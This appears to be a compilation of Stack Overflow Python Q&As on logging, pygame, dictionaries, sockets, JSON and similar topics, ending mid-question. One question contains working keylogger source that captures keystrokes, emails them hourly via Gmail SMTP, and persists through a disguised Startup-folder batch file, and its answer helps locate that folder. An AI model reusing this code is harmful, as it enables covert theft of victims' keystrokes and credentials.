Python stdout logging: terminal vs bash file Question: I am not expert in Bash and Python, so this question might appear silly. I have a Python script called `learn.py` and I noticed two different behaviours of the standard output, when redirected to a log file. If I call this from terminal, I can see the log file size growing while the script is running. $ ./learn.py > file.log However, if I create a bash file for the same purpose: #!/bin/bash ./learn.py > file.log the script starts (I checked with `pgrep`) but it does not seem to run, as the log file stays empty. Am I missing something? Answer: I solved using the [Logging facility for Python](https://docs.python.org/2/howto/logging.html), by inserting import logging logging.basicConfig(filename='file.log',level=logging.INFO) and replacing every occurrence of `print "..."` with logging.info("...") The final Bash script: #!/bin/bash ./learn.py
Creating an update function within my display class in Python Question: So I am trying to code it when I call my myDisplay.update() function I can pass whatever game element I want to update into it, to display the image. For example I made a player with a player class, and I want to pass it into myDisplay.update(player), to pull the sprite from the player class and then render it in the update method. Current Error: AttributeError: 'Display' object has no attribute 'blit' Current Code: import pygame, sys from pygame.locals import * #Constants TILESIZE = 32 MAPWIDTH = 16 MAPHEIGHT = 16 #variables playing = True #Creates Display Window class Display(object): def __init__(self, width, height, tilesize): pygame.init() pygame.display.set_caption("FarmTown Version 1.0") self.SCREEN_WIDTH = width * tilesize self.SCREEN_HEIGHT = height * tilesize self.myScreen = pygame.display.set_mode([self.SCREEN_WIDTH, self.SCREEN_HEIGHT]) def update(self, updated): self.blit(updated.image, (playerPos[0] * TILESIZE, playerPos[1] * TILESIZE)) pygame.display.update() class Controller(object): controls = { "KEY_UP": 273, "KEY_DOWN": 274, "KEY_RIGHT": 275, "KEY_LEFT": 276 } def checkInput(self): for key in self.controls: if event.key == self.controls[key]: if self.controls[key] == self.controls["KEY_UP"]: print "Up" elif self.controls[key] == self.controls["KEY_DOWN"]: print "Down" elif self.controls[key] == self.controls["KEY_RIGHT"]: print "Right" elif self.controls[key] == self.controls["KEY_LEFT"]: print "Left" class Player(object): def __init__(self): #if playerClass == "peasant": self.image = pygame.image.load("player.png") self.pos = [0, 0] #Set Up Everything To Play myDisplay = Display(MAPWIDTH, MAPHEIGHT, TILESIZE) myController = Controller() player = Player() #Game Loop Begins while playing: for event in pygame.event.get(): if event.type == QUIT: pygame.quit() sys.exit() elif event.type == KEYDOWN: myController.checkInput() myDisplay.update(player) Answer: I think you meant to subclass a pygame object. Currently Display is a subclass of just "object", which doesn't contain the "blit" method. Or did you mean to write `pygame.blit` or `pygame.display.blit` instead of `self.blit`?
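For what it's worth, `blit` is a method of `Surface` objects, so one way to write `update` is to draw onto the window Surface stored in `__init__`. The sketch below also assumes the position should come from the object's own `pos` attribute rather than the undefined `playerPos`:

    def update(self, updated):
        # blit onto the window Surface created in __init__, not onto the Display object
        self.myScreen.blit(updated.image,
                           (updated.pos[0] * TILESIZE, updated.pos[1] * TILESIZE))
        pygame.display.update()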
How do I bin and categorize numbers in Python? Question: I'm not sure if binning is the correct term, but I want to implement the following for a project I am working on: I have an array or maybe a dict describing boundaries and/or regions, for example:

    boundaries = OrderedDict([(10,'red'),(20,'blue'),(55,'purple')])

The areas are indexed from 0 to 100 (for example). I want to classify each area into a color (that is less than the key in the dict) and then plot it. For example, if it is less than 10, it is red. So far, I have:

    boundaries = OrderedDict([(10,'red'),(20,'blue'),(55,'purple')])
    areas = range(0,101)
    binned = []
    for area in areas:
        for border in boundaries.keys():
            if area < border:
                binned.append(boundaries[border])
                break

Also, I need to figure out a way to define the colors and find a package to plot it, so any ideas on how I can plot a 2-D color plot (the actual project will be in 2-D) would help. Maybe matplotlib or PIL? I have used matplotlib before but never for this type of data. Also, is there a scipy/numpy function that already does what I'm trying to do? It would be nice if the code is short and fast. This is not for an assignment of any sort (it's for a little experiment / data project of mine), so I don't want to reinvent the wheel here. Thanks in advance for any advice/help.

Answer:

    import collections
    import matplotlib.pyplot as plt

    boundaries = collections.OrderedDict([(10,'red'),(20,'blue'),(55,'purple')])
    areas = range(0,101)

    n, bins, patches = plt.hist(areas, [0]+list(boundaries), histtype='bar', rwidth=1.0)

    for (patch,color) in zip(patches,boundaries.values()):
        patch.set_color(color)

    plt.show()
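On the numpy side, `np.digitize` does the binning part directly. A sketch using the same boundaries (the extra label is there to catch values of 55 and above, which your loop simply skips):

    import numpy as np

    bounds = [10, 20, 55]
    colors = ['red', 'blue', 'purple', 'unknown']   # extra label for values >= 55
    areas = np.arange(0, 101)
    binned = [colors[i] for i in np.digitize(areas, bounds)]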
Running a .py file in python that requires input Question: the question I have is really a simple one, and maybe the issue is just myself not knowing the correct parameters for python with Linux. The file I am running uses input from the operator both to run the program, and also to get the information to convert, which I will place below: Initial_LonH = float(input("\nEnter RA's Hour >>> ")); Initial_LonM = float(input("\nEnter RA's Minute >>> ")); Initial_LonS = float(input("\nEnter Ra's Second >>> ")); Initial_LatH = float(input("\nEnter Dec's Hour >>> ")); Initial_LatM = float(input("\nEnter Dec's Minute >>> ")); Initial_LatS = float(input("\nEnter Dec's Second >>> ")); The issue when I run this in python as "python GalaxyConverter.py, the following error appears: Traceback (most recent call last): File "GalaxyConverter.py", line 105, in <module> input_Runner = str(input("\nDo you wish to convert Right Ascension and Declination into Cartesian?" File "<string>", line 1, in <module> NameError: name 'yes' is not defined It seems the issue is that the file does not know to take the command I put into the terminal as input for the python file. May I ask what I should do to fix this? The Entire Code is below: from math import radians, sin, cos, sqrt, asin, atan Minute_Con = 60; Second_Con = 3600; DT_Radians = 0.0174539252; RT_Degrees = 57.29577951; Radi_Verse = 879829141200000000000000; WRunner = True def HMS_Expand_Lon(LongitudeH, LongitudeM, LongitudeS): ##{ print("\n The Right Ascension starts as " + str(LongitudeH) + ":" + str(LongitudeM) + "." + str(LongitudeS)); LongitudeM = LongitudeM/Minute_Con; LongitudeS = LongitudeS/Second_Con; LongitudeHMS = LongitudeH + LongitudeM + LongitudeS; LongitudeHMS = LongitudeHMS * 15; print("\n The Right Ascension becomes " + str(LongitudeHMS)); return LongitudeHMS ##} def HMS_Expand_Lat(LatitudeH, LatitudeM, LatitudeS): ##{ print("\n The Declination starts as " + str(LatitudeH) + ":" + str(LatitudeM) + "." 
+ str(LatitudeS)); LatitudeM = LatitudeM/Minute_Con; LatitudeS = LatitudeS/Second_Con; LatitudeHMS = LatitudeH + LatitudeM + LatitudeS; LatitudeHMS = LatitudeHMS * 15; print("\n The Declination becomes " + str(LatitudeHMS)); return LatitudeHMS ##} def HMS_Convert_Lon(LongitudeHMS): ##{ LongitudeRAD = LongitudeHMS * DT_Radians; print("\n The Right Ascension becomes " + str(LongitudeRAD)); return LongitudeRAD ##} def HMS_Convert_Lat(LatitudeHMS): ##{ LatitudeRAD = LatitudeHMS * DT_Radians; print("\n The Declination becomes " + str(LatitudeRAD)); return LatitudeRAD ##} def RAD_Convert_Lon(LongitudeRAD, LatitudeRAD): ##{ Con_Lon = LongitudeRAD * LongitudeRAD; Con_Lat = LatitudeRAD * LatitudeRAD; Con_Lat_Lon = sqrt(Con_Lat + Con_Lon); print("\n The Right Ascension becomes " + str(Con_Lat_Lon)); return Con_Lat_Lon ##} def RAD_Convert_Lat(LongitudeRAD, LatitudeRAD): ##{ Con_Lon = LongitudeRAD; Con_Lat = LatitudeRAD; Con_Lon_Lat = atan(Con_Lon / Con_Lat); print("\n The Declination becomes " + str(Con_Lon_Lat)); return Con_Lon_Lat ##} def POL_Convert_Lon(LongitudePOL, LatitudePOL): ##{ POL_Lon = LongitudePOL * cos(LatitudePOL); DEG_Lon = POL_Lon * RT_Degrees; print("\n X finally becomes " + str(DEG_Lon)); return DEG_Lon ##} def POL_Convert_Lat(LongitudePOL, LatitudePOL): ##{ POL_Lat = LongitudePOL * sin(LatitudePOL); DEG_Lat = POL_Lat * RT_Degrees; print("\n Y finally becomes " + str(DEG_Lat)); return DEG_Lat ##} def main(): ##{ Initial_LonH = float(input("\nEnter RA's Hour >>> ")); Initial_LonM = float(input("\nEnter RA's Minute >>> ")); Initial_LonS = float(input("\nEnter Ra's Second >>> ")); Initial_LatH = float(input("\nEnter Dec's Hour >>> ")); Initial_LatM = float(input("\nEnter Dec's Minute >>> ")); Initial_LatS = float(input("\nEnter Dec's Second >>> ")); Lon_Expanded = HMS_Expand_Lon(Initial_LonH, Initial_LonM, Initial_LonS); Lat_Expanded = HMS_Expand_Lat(Initial_LatH, Initial_LatM, Initial_LatS); Lon_Converted = HMS_Convert_Lon(Lon_Expanded); Lat_Converted = HMS_Convert_Lat(Lat_Expanded); Lon_RAD = RAD_Convert_Lon(Lon_Converted, Lat_Converted); Lat_RAD = RAD_Convert_Lat(Lon_Converted, Lat_Converted); Lon_POL = POL_Convert_Lon(Lon_RAD, Lat_RAD); Lat_POL = POL_Convert_Lat(Lon_RAD, Lat_RAD); X_Scaled = Lon_POL / Radi_Verse; Y_Scaled = Lat_POL / Radi_Verse; print("\n To scale of the theoretical length of universe, X = " + str(X_Scaled)); print("\n To scale of the theoretical length of the universe, Y = " + str(Y_Scaled)); ##} while WRunner == True: input_Runner = input("\nDo you wish to convert Right Ascension and Declination into Cartesian?" "\nif so, please type yes, if not, please type no >>> "); if input_Runner == "yes": main(); if input_Runner != "yes": break Answer: In python 3, you can just use `input` in your example, it can input strings. But in python 2, the same function is `raw_input`. `input` function in Python 2 is equals to `eval(raw_input(prompt))`, it will evaluate input string as a Python expression. Obviously your running python version is python 2, but I don't know what the code's python version is. But you need to modify all `input` to `raw_input` if it is python version is 2. Ref: <https://docs.python.org/2/library/functions.html#input> <https://docs.python.org/3/library/functions.html#input>
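If the script has to run unchanged under both versions, a common sketch is to alias the name once near the top of the file:

    try:
        input = raw_input   # Python 2: always read the raw string
    except NameError:
        pass                # Python 3: input() already returns a string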
load an already written GTK python codes into a GUI designer Question: I want to change the interface of a written application. this application is written in python and GTK . I don't want to change the codes manually by myself but although I need an interface designer so I can import this application to it and the graphically apply my intended changes to it . I tried Glade and QTdesigner but they produce .ui file and I couldn't find a tool to convert back a .ui file to python code. plus that the don't open python files directly and didn't have import options. any solution will be appreciated. thanks Answer: It really depends on the application. If the application uses `*.glade` or `*.ui` files you can - depending on how well it is designed re-arrange certain elements and swap out container types. If there are no such files, you are out of luck. Then the ui is "hard"-coded (as hard as python code can get..) and you have to modify the widget hirarchy by modifying python code yourself. There is no such editor being able to extract a layout/ui file from code itself. * * * gtkinspector or formerly known as gtkparasite can modify properties of widgets on the fly but nothing that really modifies the python code of the running application. They sneak around the application code and modify the widget tree from back behind through means of the gtk module lib interface (correct me if I am wrong here, not totally sure).
Find startup folder in windows 8 using python Question: I have a code that adds a batch file to the startup folder so that it runs when the computer starts up. my code is the following: path = 'C:\\Users\\%s\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Batch.BAT' %win32api.GetUserName() f = open(path, 'w') This works just fine on Win 7 but in Win8 the startup folder was moved and I can't find access to it. How do I find the right folder to put it in? Thank you Isaac **UPDATE: My code works and runs when it is in .pyw but once I turn it to .exe it doesn't... This I don't understand** Full code: import win32api import sys import pythoncom, pyHook import time import smtplib import thread import re import os global text global start def main(): global text global start text = '' start = time.time() AddToStartUp(fixpath(findDirectory())) while True: hm = pyHook.HookManager() hm.KeyDown = OnKeyboardEvent hm.HookKeyboard() pythoncom.PumpMessages() def sendemail(from_addr, to_addr_list, cc_addr_list, subject, message, login, password, smtpserver='smtp.gmail.com:587'): header = 'From: %s\n' % from_addr header += 'To: %s\n' % ','.join(to_addr_list) header += 'Cc: %s\n' % ','.join(cc_addr_list) header += 'Subject: %s\n\n' % subject message = header + message server = smtplib.SMTP(smtpserver) server.starttls() server.login(login,password) problems = server.sendmail(from_addr, to_addr_list, message) server.quit() return problems def OnKeyboardEvent(event): global start global text text += chr(event.Ascii) print text if time.time()-start > 3600: thread.start_new_thread(sendemail, ('email','email','','Keylogger',text,'email','password')) start = time.time() return True def fixpath(path): arr = re.split(r'\\', path) direct = '' for i in arr: direct += i + '\\' return direct def AddToStartUp(direct): path = 'C:\\Users\\%s\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\innocentCode.BAT' %win32api.GetUserName() f = open(path, 'w') f.write("""cd %s\nstart keylogger\nexit"""%direct) def findDirectory(): return os.path.dirname(os.path.realpath(__file__)) if __name__ == "__main__": main() Answer: The following code shows how to find it via the win32 api. I once found it searching the web - no credits for me. from win32com.shell import shell, shellcon def startupdirectory(): return shell.SHGetFolderPath( 0, shellcon.CSIDL_COMMON_STARTUP, 0,# null access token (no impersonation) 0 # want current value, shellcon.SHGFP_TYPE_CURRENT isn't available, this seems to work ) if __name__ == '__main__': print startupdirectory()
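Note that `CSIDL_COMMON_STARTUP` points at the all-users Startup folder; for the per-user folder the question's hard-coded path refers to, the same call with `shellcon.CSIDL_STARTUP` should work (a sketch, not tested on Windows 8):

    from win32com.shell import shell, shellcon

    def user_startup_directory():
        # per-user Startup folder, resolved by Windows itself
        return shell.SHGetFolderPath(0, shellcon.CSIDL_STARTUP, 0, 0)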
TypeError: 'bool' object is not callable - python Question: I'm trying to implement a simple maths game where the user is given random numbers and operators and has to work out the answer. I found sources on the internet that suggested using the operator module, which is why I used it; if there is a more efficient / easier way of achieving this I am very open to alternatives. Essentially I am trying to remove this horrible `<built-in function add>` and swap it for something more user friendly like '+' or 'add', something along those lines, but I keep getting the error 'TypeError: 'bool' object is not callable - python'. I really don't know what this means; I am new to Python and am very confused.

    from operator import add, sub, mul, floordiv

    operators = (add == str("add"), sub == str("subtract"), mul == str("multiply"), floordiv == str("divide"))
    operator = random.choice(operators)
    answer = operator(number1, number2)
    question = print("What is ", number1, operator, number2, "?")

Answer: What you get as a result of the first line is

    operators = (False, False, False, False)

or something along those lines. Then you are trying to call a boolean, which gives you the exception you see. `add == str("add")` will evaluate to `False`, since you're trying to compare a function to a string. I'm assuming you are trying to implement a simple math game, so instead of comparing the `operator` functions to strings, you can just use a simple dictionary:

    operators = {
       'add': add,
       'subtract': sub,
       'multiply': mul,
       'divide': floordiv
    }

    answer = operators[random.choice(operators.keys())](number1, number2)
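A slightly fuller sketch (assuming `number1` and `number2` are defined elsewhere in your game) that also keeps the readable name around, so the question text can show 'add' instead of the function object:

    import random
    from operator import add, sub, mul, floordiv

    operators = {
        'add': add,
        'subtract': sub,
        'multiply': mul,
        'divide': floordiv,
    }

    name = random.choice(list(operators))        # pick the word, e.g. 'add'
    answer = operators[name](number1, number2)   # look up the matching function
    print("What is %s %s %s ?" % (number1, name, number2))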
Python variable not recognized in if-statement Question: Here is all the code, but in main(), a while loop checks if on_title_screen is true, and if it is, displays the title screen, but if not, displays the game. However, after starting the program, running the game, and returning to the title screen, attempting to press the start button makes both the code for if on_title_screen==True and elif on_title_screen==False run when only the first bit should run. import random import pygame from pygame import * import math import sys #Presets for window size=width,height=500,500 Ag=-9.80665 clock = pygame.time.Clock() white=(255,255,255) blue=(0,0,255) red=(255,0,0) gray_bgColor=(190,193,212) #Initialise pygame Surface as screen pygame.init() pygame.font.init() screen=pygame.display.set_mode(size) pygame.display.set_caption("Flappy Bird Replica") def falling_loop(): for event in pygame.event.get(): if event.type==pygame.KEYDOWN: if event.key==pygame.K_UP: preset.vY=-10 if preset.yPos>height-50: preset.on_title_screen=True preset.vY+=1 preset.yPos+=preset.vY class presets(): #Holds all the "global" values for the game vY=0 xPos,yPos=200,100 on_title_screen=True class graphics(): #Holds the methods for loading/displaying graphics def load_images(self): #Loads the background and sprite images self.background_image=pygame.image.load("flappy_background.png").convert() self.bird_image=pygame.image.load("flappy_sprite.jpg").convert() self.bird_image.set_colorkey(white) self.birdHitBox=self.bird_image.get_rect() def show_background(self): #blits the background screen.blit(self.background_image,[0,0]) def show_bird(self): #blits the bird onto screen at xPos, yPos screen.blit(self.bird_image,[preset.xPos,preset.yPos]) def refresh_display(self): #updates the display screen.blit(self.background_image,[0,0]) falling_loop() self.show_bird() class titleScreen(): #Holds the methods for the title screen/menu def title(self): #Sets up the title titleText="Flappy Game" titlePos=(0,0) currentFont=pygame.font.SysFont("arialms",30,bold=True,italic=True) renderTitle=currentFont.render(titleText,1,blue,gray_bgColor) self.titlex,self.titley=currentFont.size(titleText) screen.blit(renderTitle,titlePos) def start(self): #Sets up the start Button startText="Start Game" self.startPos=(0,self.titley) currentFont=pygame.font.SysFont("arialms",25,bold=False,italic=False) renderStart=currentFont.render(startText,1,blue,gray_bgColor) self.startx,self.starty=currentFont.size(startText) self.start_rect = pygame.Rect(self.startPos[0],self.titley,self.startx,self.starty) screen.blit(renderStart,self.startPos) def quit(self): #Sets up the quit button quitText="Quit" self.quitPos=(0,self.starty+self.titley) currentFont=pygame.font.SysFont("arialms",25,bold=False,italic=False) renderQuit=currentFont.render(quitText,1,red,gray_bgColor) self.quitx,self.quity=currentFont.size(quitText) self.quit_rect = pygame.Rect(self.quitPos[0],self.titley+self.starty,self.quitx,self.quity) screen.blit(renderQuit,self.quitPos) def get_click(self): #Gets mouse click and processes outcomes for event in pygame.event.get(): if event.type==pygame.MOUSEBUTTONDOWN: x,y=pygame.mouse.get_pos() #Tests for start: if self.start_rect.collidepoint(x,y): print("start") preset.on_title_screen=False graphicsC.show_background() elif self.quit_rect.collidepoint(x,y): print("quit") sys.exit() #Assign objects to respective classes preset=presets() titleC=titleScreen() graphicsC=graphics() def setupTitle(): #bundles all title_screen functions titleC.title() titleC.start() 
        titleC.quit()

    def main():
        graphicsC.load_images()
        graphicsC.show_background()
        setupTitle()
        while True:
            clock.tick(30)
            if preset.on_title_screen==False:
                graphicsC.refresh_display()
                print("working...")
            elif preset.on_title_screen==True:
                setupTitle()
                titleC.get_click()
            pygame.display.flip()

    main()

Answer: You should set these values with `self.xxx` inside an `__init__` method, so that they become instance attributes that are defined when each object is initialized (as written, they are class attributes shared through the class itself). So use:

    class presets():
        #Holds all the "global" values for the game
        def __init__(self):
            self.vY=0
            self.xPos,self.yPos=200,100
            self.on_title_screen=True

However, making 'global' variables this way probably isn't the best way, as [Cyber mentions in the comments](http://stackoverflow.com/questions/27129680/python-variable-not-recognized-in-if-statement#comment42758526_27129680).
How to parse a CLI command output (table) in python? Question: I am a newbie to parsing. switch-630624 [standalone: master] (config) # show interface ib status Interface Description Speed Current line rate Logical port state Physical port state --------- ----------- --------- ----------------- ------------------ ------------------- Ib 1/1 14.0 Gbps rate 56.0 Gbps Initialize LinkUp Ib 1/2 14.0 Gbps rate 56.0 Gbps Initialize LinkUp Ib 1/3 2.5 Gbps rate only 10.0 Gbps Down Polling Assume I have an engine which injects the command on the switch, and put the above output as 1 huge string in a variable named "output". I would like to return a dictionary which includes only the ports number as follows: {'Ib1/11': '1/11', 'Ib1/10': '1/10', ... , } I guess I should use the Python`s Subprocess module and regular expressions. Number of ports can vary (can be 3, 10, 20, 30, 60...). I will appreciate any kind of direction. Thanks, Qwerty Answer: # Did this in Python 2.7 import re # Assume your input is in this file INPUT_FILE = 'text.txt' # Regex to only pay attention to lines starting with Ib # and capture the port info regex = re.compile(r'^(Ib\s*\S+)') result = [] # Store results in a list with open(INPUT_FILE, 'r') as theFile: for line in theFile: match = regex.search(line) if not match: continue result.append(match.group()) print result
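To get the dictionary shape asked for in the question ({'Ib1/1': '1/1', ...}), the captured strings can be post-processed, for example (a sketch):

    ports = {}
    for entry in result:                        # e.g. "Ib 1/1"
        port = entry.replace('Ib', '').strip()  # -> "1/1"
        ports['Ib' + port] = port               # -> {'Ib1/1': '1/1'}
    print ports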
Python: Appending to lists as keys within a dictionary Question: def classify(kingdom, species): """ (list of str, list of str) -> dict classifies each of the species in the right class in the format of a dictionary PRECONDITION: len(kingdom) = len(species) >>>classify(['Animal', 'Animal', 'Plant', 'Protist'], ['Dog', 'Cat', 'Daffodil', 'Plankton']) {'Animal' : ['Dog', 'Cat'], 'Plant' : ['Daffodil'], 'Protist' : ['Plankton']} """" I am trying to complete this function; however, i do not know how to assign a variable to a dictionary that uses lists as the values, nor do I know how to add new values to the list. So far this is my attempt def classify(kingdom, species): d = {} for j in range(len(kingdom)): d[kingdom[j]] = [] for k in range(len(species)): d[kingdom[k]].append(species[k]) return d For some reason in returns the incorrect result. >>>classify(['Animal', 'Animal', 'Plant', 'Protist'], ['Dog', 'Cat', 'Daffodil', 'Plankton']) {'Protist': ['Dog', 'Cat', 'Daffodil', 'Plankton'], 'Plant': ['Dog', 'Cat', 'Daffodil', 'Plankton'], 'Animal': ['Dog', 'Cat', 'Daffodil', 'Plankton']} Answer: Two problems. First, everywhere you're using `kingdom[1]`, you should just be using `kingdom`. Seems like you used to have a function that took a single list containing two sublists, and you didn't update the code to correspond to the new signature. Second, doing `d[kingdom[j]] = b` will cause all values in `d` to point to the exact same list. Appending to one of them will cause all the other ones to be appended to as well. Just assign a brand new list each time. def classify(kingdom, species): d = {} for j in range(len(kingdom)): d[kingdom[j]] = [] for k in range(len(species)): d[kingdom[k]].append(species[k]) return d print classify(['Animal', 'Animal', 'Plant', 'Protist'], ['Dog', 'Cat', 'Daffodil', 'Plankton']) Result: {'Plant': ['Daffodil'], 'Protist': ['Plankton'], 'Animal': ['Dog', 'Cat']} * * * Bonus: You may find it worthwhile to refactor your code. You can eliminate the first loop in your function if you make `d` a `collections.defaultdict`; you won't need to set up the lists, since they'll be created by default. from collections import defaultdict def classify(kingdom, species): d = defaultdict(list) for k in range(len(species)): d[kingdom[k]].append(species[k]) return d And you can make the second loop arguably more clear if you iterate through the lists' elements directly instead of iterating through their indices. from collections import defaultdict def classify(kingdom, species): d = defaultdict(list) for name, kind in zip(species, kingdom): d[kind].append(name) return d
invalid literal for int() with base 10 - django - updated Question: I am a django beginner, and I am trying to make a child-parent like combo box, (bars depends on city depends on country) and I get this error. **UPDATE: Changed the model and the default value for the foreign key, but still the same error. Any help? thanks!** this is models.py: from django.db import models from smart_selects.db_fields import ChainedForeignKey DEFAULT_COUNTRY_ID = 1 # id of Israel class BarName(models.Model): name = models.CharField(max_length=20) def __unicode__(self): return self.name class Country(models.Model): country = models.CharField(max_length=20) def __unicode__(self): return self.country class City(models.Model): city = models.CharField(max_length=20) country = models.ForeignKey(Country, default=DEFAULT_COUNTRY_ID) def __unicode__(self): return self.city class Bar(models.Model): country = models.ForeignKey(Country) city = ChainedForeignKey(City, chained_field='country' , chained_model_field='country', auto_choose=True) name = ChainedForeignKey(BarName, chained_field='city', chained_model_field='city', auto_choose=True) def __unicode__(self): return '%s %s %s' % (self.name, self.city, self.country) class Admin: pass from running 'python manage.py migrate': ➜ baromatix python manage.py migrate Operations to perform: Apply all migrations: admin, bars, contenttypes, auth, sessions Running migrations: ....... value = self.get_prep_value(value) File "/Library/Python/2.7/site-packages/django/db/models/fields/__init__.py", line 915, in get_prep_value return int(value) ValueError: invalid literal for int() with base 10: 'DEFAULT VALUE' Answer: I solved this issue when deleting the **old migrations files** that django created.
Getting Deeper Level JSON Values in Python Question: I have a Python script that make an API call to retrieve data from Zendesk. (Using Python 3.x) The JSON object has a structure like this: { "id": 35436, "url": "https://company.zendesk.com/api/v2/tickets/35436.json", "external_id": "ahg35h3jh", "created_at": "2009-07-20T22:55:29Z", "updated_at": "2011-05-05T10:38:52Z", "type": "incident", "subject": "Help, my printer is on fire!", "raw_subject": "{{dc.printer_on_fire}}", "description": "The fire is very colorful.", "priority": "high", "status": "open", "recipient": "[email protected]", "requester_id": 20978392, "submitter_id": 76872, "assignee_id": 235323, "organization_id": 509974, "group_id": 98738, "collaborator_ids": [35334, 234], "forum_topic_id": 72648221, "problem_id": 9873764, "has_incidents": false, "due_at": null, "tags": ["enterprise", "other_tag"], "via": { "channel": "web" }, "custom_fields": [ { "id": 27642, "value": "745" }, { "id": 27648, "value": "yes" } ], "satisfaction_rating": { "id": 1234, "score": "good", "comment": "Great support!" }, "sharing_agreement_ids": [84432] } Where I am running into issues is in the `"custom_fields"` section specifically. I have a particular custom field inside of each ticket I need the value for, and I only want that particular value. To spare you too many specifics of the Python code, I am reading through each value below for each ticket and adding it to an output variable before writing that output variable to a .csv. Here is the particular place the breakage is occuring: output += str(ticket['custom_fields'][id:23825198]).replace(',', '')+',' All the replace nonsense is to make sure that since it is going into a comma delimited file, any commas inside of the values are removed. Anyway, here is the error I am getting: output += str(ticket['custom_fields'][id:int(23825198)]).replace(',', '')+',' TypeError: slice indices must be integers or None or have an __index__ method As you can see I have tried a couple different variations of this to try and resolve the issue, and have yet to find a fix. I could use some help! Thanks... Answer: Are you using json.loads()? If so you can then get the keys, and do an if statement against the keys. An example on how to get the keys and their respective values is shown below. import json some_json = """{ "id": 35436, "url": "https://company.zendesk.com/api/v2/tickets/35436.json", "external_id": "ahg35h3jh", "created_at": "2009-07-20T22:55:29Z", "updated_at": "2011-05-05T10:38:52Z", "type": "incident", "subject": "Help, my printer is on fire!", "raw_subject": "{{dc.printer_on_fire}}", "description": "The fire is very colorful.", "priority": "high", "status": "open", "recipient": "[email protected]", "requester_id": 20978392, "submitter_id": 76872, "assignee_id": 235323, "organization_id": 509974, "group_id": 98738, "collaborator_ids": [35334, 234], "forum_topic_id": 72648221, "problem_id": 9873764, "has_incidents": false, "due_at": null, "tags": ["enterprise", "other_tag"], "via": { "channel": "web" }, "custom_fields": [ { "sid": 27642, "value": "745" }, { "id": 27648, "value": "yes" } ], "satisfaction_rating": { "id": 1234, "score": "good", "comment": "Great support!" 
}, "sharing_agreement_ids": [84432] }""" # load the json object zenJSONObj = json.loads(some_json) # Shows a list of all custom fields print("All the custom field data") print(zenJSONObj['custom_fields']) print("----") # Tells you all the keys in the custom_fields print("How keys and the values") for custom_field in zenJSONObj['custom_fields']: print("----") for key in custom_field.keys(): print("key:",key," value: ",custom_field[key]) You can then modify the JSON object by doing something like print(zenJSONObj['custom_fields'][0]) zenJSONObj['custom_fields'][0]['value'] = 'something new' print(zenJSONObj['custom_fields'][0]) Then re-encode it using the following: newJSONObject = json.dumps(zenJSONObj, sort_keys=True, indent=4) I hope this is of some help.
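For the concrete case in the question, pulling out the value of one particular custom field id, here is a short sketch over the same structure (assuming `ticket` is the dict for a single ticket inside your loop):

    wanted_id = 23825198   # the custom field id from the question

    value = ''
    for field in ticket['custom_fields']:
        if field['id'] == wanted_id:
            value = str(field['value']).replace(',', '')
            break

    output += value + ','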
Python: How to create a directory and overwrite an existing one if necessary? Question: I want to create a new directory and remove the old one if it exists. I use the following code:

    if os.path.isdir(dir_name):
        shutil.rmtree(dir_name)
    os.makedirs(dir_name)

It works if the directory does not exist. It errors if the directory does exist and the program is run normally. (WindowsError: [Error 5] Access is denied: 'my_directory') However, it also works if the directory already exists and the program is executed in debug mode line by line. I guess `shutil.rmtree()` and `makedirs()` need some time in between their calls. What is the correct code so that it doesn't create an error?

Answer: In Python a statement is executed only once the previous statement has finished; that's how an interpreter works. My guess is that `shutil.rmtree` tells the filesystem to delete some directory tree, and at that moment Python considers the statement finished, _even if the filesystem has not yet deleted the complete directory tree_. For that reason, if the directory tree is big enough, when Python gets to the line `os.makedirs(dir_name)` the directory can still exist. A faster operation (faster than deleting) is to rename the directory:

    import os
    import tempfile
    import shutil

    dir_name = "test"

    if (os.path.exists(dir_name)):
        # `tempfile.mktemp` Returns an absolute pathname of a file that
        # did not exist at the time the call is made. We pass
        # dir=os.path.dirname(dir_name) here to ensure we will move
        # to the same filesystem. Otherwise, shutil.copy2 will be used
        # internally and the problem remains.
        tmp = tempfile.mktemp(dir=os.path.dirname(dir_name))
        # Rename the dir.
        shutil.move(dir_name, tmp)
        # And delete it.
        shutil.rmtree(tmp)

    # At this point, even if tmp is still being deleted,
    # there is no name collision.
    os.makedirs(dir_name)
I need the server to send messages to all clients (Python, sockets) Question: This is my server program, how can it send the data received from each client to every other client? import socket import os from threading import Thread import thread def listener(client, address): print "Accepted connection from: ", address while True: data = client.recv(1024) if not data: break else: print repr(data) client.send(data) client.close() host = socket.gethostname() port = 10016 s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((host,port)) s.listen(3) th = [] while True: print "Server is listening for connections..." client, address = s.accept() th.append(Thread(target=listener, args = (client,address)).start()) s.close() Answer: If you need to send a message to all clients, you need to keep a collection of all clients in some way. For example: clients = set() clients_lock = threading.Lock() def listener(client, address): print "Accepted connection from: ", address with clients_lock: clients.add(client) try: while True: data = client.recv(1024) if not data: break else: print repr(data) with clients_lock: for c in clients: c.sendall(data) finally: with clients_lock: clients.remove(client) client.close() It would probably be clearer to factor parts of this out into separate functions, like a `broadcast` function that did all the sends. Anyway, this is the _simplest_ way to do it, but it has problems: * If one client has a slow connection, everyone else could bog down writing to it. And while they're blocking on their turn to write, they're not reading anything, so you could overflow the buffers and start disconnecting everyone. * If one client has an error, the client whose thread is writing to that client could get the exception, meaning you'll end up disconnecting the wrong user. So, a better solution is to give each client a queue, and a writer thread servicing that queue, alongside the reader thread. (You can then extend this in all kinds of ways—put limits on the queue so that people stop trying to talk to someone who's too far behind, etc.) * * * As [Anzel](http://stackoverflow.com/users/3849456/anzel) points out, there's a _different_ way to design servers besides using a thread (or two) per client: using a [reactor](http://en.wikipedia.org/wiki/Reactor_pattern) that multiplexes all of the clients' events. Python 3.x has some great libraries for this built in, but 2.7 only has the clunky and out-of-date [`asyncore`](https://docs.python.org/2/library/asyncore.html)/[`asynchat`](https://docs.python.org/2/library/asynchat.html) and the low-level [`select`](https://docs.python.org/2/library/select.html). As Anzel says, [Python SocketServer: sending to multiple clients](http://stackoverflow.com/questions/3670127/python-socketserver- sending-to-multiple-clients) has an answer using `asyncore`, which is worth reading. But I wouldn't actually use that. If you want to write a reactor- based server in Python 2.x, I'd either use a better third-party framework like [Twisted](https://twistedmatrix.com/trac/), or find or write a very simple one that sits directly on `select`.
Django/Python: CSV for-in loop overriding first row each time through Question:

    class CSVDownload(View):
        """ Prepares CSV file version to download """
        #more code here
        f = StringIO.StringIO()
        writer = csv.writer(f, dialect='excel')
        for v in visit_list:
